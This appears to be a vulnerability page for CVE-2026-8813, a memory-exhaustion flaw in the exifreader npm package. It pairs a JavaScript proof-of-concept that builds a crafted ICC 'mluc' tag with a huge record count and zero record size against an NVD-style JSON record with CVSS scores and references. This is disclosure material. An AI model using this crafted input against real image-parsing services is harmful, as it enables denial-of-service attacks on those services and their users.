CVE-2026-8813

// PoC for CVE-2026-8813 // This script demonstrates the concept of triggering the memory exhaustion // by crafting a buffer with a malicious ICC 'mluc' tag structure. const ExifReader = require('exifreader'); const fs = require('fs'); function createMaliciousIccBuffer() { // A real ICC profile is complex, here we simulate the vulnerable structure // focusing on the 'mluc' tag parsing logic. const size = 200; const buffer = Buffer.alloc(size); // ICC Profile Header (Simplified) buffer.write('acsp', 36); // Profile Signature // Simulating a Tag Table Entry pointing to a 'mluc' tag const tagOffset = 100; buffer.write('mluc', tagOffset); // Tag Signature: 'mluc' buffer.writeUInt32BE(0x000000C, tagOffset + 4); // Offset to tag data (arbitrary for PoC) buffer.writeUInt32BE(0xFFFFFFFF, tagOffset + 8); // Data Size (large) // Simulating the 'mluc' Tag Data Structure const dataOffset = 120; buffer.write('mluc', dataOffset); // Type signature buffer.writeUInt32BE(0, dataOffset + 4); // Reserved (0) buffer.writeUInt32BE(10000000, dataOffset + 8); // Record Count (Huge number) buffer.writeUInt32BE(0, dataOffset + 12); // Record Size (0) -> TRIGGER return buffer; } try { console.log("[+] Generating malicious ICC profile buffer..."); const maliciousBuffer = createMaliciousIccBuffer(); // In a real scenario, this would be embedded in a JPEG/APP2 marker. // We attempt to load it to demonstrate the parsing behavior. console.log("[+] Attempting to parse with vulnerable ExifReader..."); console.log("[!] WARNING: This may cause the process to run out of memory and crash."); // ExifReader.load(maliciousBuffer); // Uncomment to test against vulnerable version } catch (error) { console.error("Error during PoC execution:", error); }

{"cve": {"id": "CVE-2026-8813", "sourceIdentifier": "[email protected]", "published": "2026-05-19T07:16:30.193", "lastModified": "2026-05-19T07:16:30.193", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "This affects versions of the package exifreader before 4.39.0. A crafted image containing an ICC mluc tag can set an attacker-controlled record count together with a zero record size. During parsing, ExifReader repeatedly processes the same record and appends entries to an array without sufficient bounds validation, causing excessive memory growth. In applications that parse attacker-supplied images, this may lead to denial of service through memory exhaustion."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1284"}]}], "references": [{"url": "https://gist.github.com/yuki-matsuhashi/3243ea38e5fbf8cfe19b624f04c9f4b4", "source": "[email protected]"}, {"url": "https://github.com/mattiasw/ExifReader/commit/c9d88b67e127b2dcc7b46e328df468257fb2dc30", "source": "[email protected]"}, {"url": "https://security.snyk.io/vuln/SNYK-JS-EXIFREADER-16689335", "source": "[email protected]"}]}}